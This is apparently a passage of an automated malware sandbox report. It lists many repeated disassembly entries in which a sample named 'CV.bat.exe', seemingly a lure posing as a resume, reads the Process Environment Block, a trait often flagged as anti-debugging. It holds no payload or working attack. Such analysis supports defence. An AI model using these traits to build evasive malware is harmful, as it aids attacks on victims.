Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124AD30 mov eax, dword ptr fs:[00000030h] 8_2_0124AD30
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012CA537 mov eax, dword ptr fs:[00000030h] 8_2_012CA537
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h] 8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h] 8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h] 8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h] 8_2_0127513A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h] 8_2_0127513A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h] 8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h] 8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h] 8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124C962 mov eax, dword ptr fs:[00000030h] 8_2_0124C962
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h] 8_2_0126C577
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h] 8_2_0126C577
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h] 8_2_0124B171
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h] 8_2_0124B171
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h] 8_2_0126B944
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h] 8_2_0126B944
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01283D43 mov eax, dword ptr fs:[00000030h] 8_2_01283D43
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C3540 mov eax, dword ptr fs:[00000030h] 8_2_012C3540
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01267D50 mov eax, dword ptr fs:[00000030h] 8_2_01267D50
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012735A1 mov eax, dword ptr fs:[00000030h] 8_2_012735A1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h] 8_2_012761A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h] 8_2_012761A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C69A6 mov eax, dword ptr fs:[00000030h] 8_2_012C69A6
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h] 8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h] 8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h] 8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h] 8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h] 8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h] 8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h] 8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h] 8_2_013105AC
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h] 8_2_013105AC
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A185 mov eax, dword ptr fs:[00000030h] 8_2_0127A185
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126C182 mov eax, dword ptr fs:[00000030h] 8_2_0126C182
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h] 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h] 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h] 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h] 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h] 8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h] 8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h] 8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h] 8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h] 8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272990 mov eax, dword ptr fs:[00000030h] 8_2_01272990
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h] 8_2_0127FD9B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h] 8_2_0127FD9B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012D41E8 mov eax, dword ptr fs:[00000030h] 8_2_012D41E8
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h] 8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h] 8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012F8DF1 mov eax, dword ptr fs:[00000030h] 8_2_012F8DF1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov ecx, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h] 8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h] 8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h] 8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h] 8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h] 8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h] 8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127BC2C mov eax, dword ptr fs:[00000030h] 8_2_0127BC2C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h] 8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h] 8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h] 8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h] 8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h] 8_2_01314015
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h] 8_2_01314015
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h] 8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h] 8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h] 8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h] 8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h] 8_2_01301C06
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h] 8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h] 8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h] 8_2_012C7016
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h] 8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h] 8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h] 8_2_0131740D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01302073 mov eax, dword ptr fs:[00000030h] 8_2_01302073
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01311074 mov eax, dword ptr fs:[00000030h] 8_2_01311074
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126746D mov eax, dword ptr fs:[00000030h] 8_2_0126746D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A44B mov eax, dword ptr fs:[00000030h] 8_2_0127A44B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h] 8_2_01260050
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h] 8_2_01260050
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h] 8_2_012DC450
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h] 8_2_012DC450
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012890AF mov eax, dword ptr fs:[00000030h] 8_2_012890AF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h] 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127F0BF mov ecx, dword ptr fs:[00000030h] 8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h] 8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h] 8_2_0127F0BF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249080 mov eax, dword ptr fs:[00000030h] 8_2_01249080
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h] 8_2_012C3884
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h] 8_2_012C3884
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125849B mov eax, dword ptr fs:[00000030h] 8_2_0125849B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012458EC mov eax, dword ptr fs:[00000030h] 8_2_012458EC
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013014FB mov eax, dword ptr fs:[00000030h] 8_2_013014FB
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h] 8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h] 8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h] 8_2_012C6CF0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318CD6 mov eax, dword ptr fs:[00000030h] 8_2_01318CD6
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov ecx, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h] 8_2_012DB8D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h] 8_2_01244F2E
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h] 8_2_01244F2E
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127E730 mov eax, dword ptr fs:[00000030h] 8_2_0127E730
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h] 8_2_0127A70E
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h] 8_2_0127A70E
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130131B mov eax, dword ptr fs:[00000030h] 8_2_0130131B
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126F716 mov eax, dword ptr fs:[00000030h] 8_2_0126F716
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h] 8_2_0131070D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h] 8_2_0131070D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h] 8_2_012DFF10
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h] 8_2_012DFF10
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124DB60 mov ecx, dword ptr fs:[00000030h] 8_2_0124DB60
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125FF60 mov eax, dword ptr fs:[00000030h] 8_2_0125FF60
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318F6A mov eax, dword ptr fs:[00000030h] 8_2_01318F6A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h] 8_2_01273B7A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h] 8_2_01273B7A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124DB40 mov eax, dword ptr fs:[00000030h] 8_2_0124DB40
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125EF40 mov eax, dword ptr fs:[00000030h] 8_2_0125EF40
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318B58 mov eax, dword ptr fs:[00000030h] 8_2_01318B58
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124F358 mov eax, dword ptr fs:[00000030h] 8_2_0124F358
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h] 8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h] 8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h] 8_2_01274BAD
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01315BA5 mov eax, dword ptr fs:[00000030h] 8_2_01315BA5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h] 8_2_01251B8F
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h] 8_2_01251B8F
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012FD380 mov ecx, dword ptr fs:[00000030h] 8_2_012FD380
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272397 mov eax, dword ptr fs:[00000030h] 8_2_01272397
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01258794 mov eax, dword ptr fs:[00000030h] 8_2_01258794
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127B390 mov eax, dword ptr fs:[00000030h] 8_2_0127B390
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h] 8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h] 8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h] 8_2_012C7794
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130138A mov eax, dword ptr fs:[00000030h] 8_2_0130138A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h] 8_2_012703E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126DBE9 mov eax, dword ptr fs:[00000030h] 8_2_0126DBE9
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012837F5 mov eax, dword ptr fs:[00000030h] 8_2_012837F5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h] 8_2_012C53CA
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h] 8_2_012C53CA
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124E620 mov eax, dword ptr fs:[00000030h] 8_2_0124E620
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h] 8_2_01284A2C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h] 8_2_01284A2C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012FFE3F mov eax, dword ptr fs:[00000030h] 8_2_012FFE3F
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h] 8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h] 8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h] 8_2_0124C600
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01278E00 mov eax, dword ptr fs:[00000030h] 8_2_01278E00
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01258A0A mov eax, dword ptr fs:[00000030h] 8_2_01258A0A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h] 8_2_0124AA16
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h] 8_2_0124AA16
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h] 8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01245210 mov ecx, dword ptr fs:[00000030h] 8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h] 8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h] 8_2_01245210
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301608 mov eax, dword ptr fs:[00000030h] 8_2_01301608
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01263A1C mov eax, dword ptr fs:[00000030h] 8_2_01263A1C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h] 8_2_0127A61C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h] 8_2_0127A61C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125766D mov eax, dword ptr fs:[00000030h] 8_2_0125766D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h] 8_2_012FB260
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h] 8_2_012FB260
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128927A mov eax, dword ptr fs:[00000030h] 8_2_0128927A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318A62 mov eax, dword ptr fs:[00000030h] 8_2_01318A62
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h] 8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h] 8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h] 8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h] 8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h] 8_2_0126AE73
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h] 8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h] 8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h] 8_2_01249240
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h] 8_2_01249240
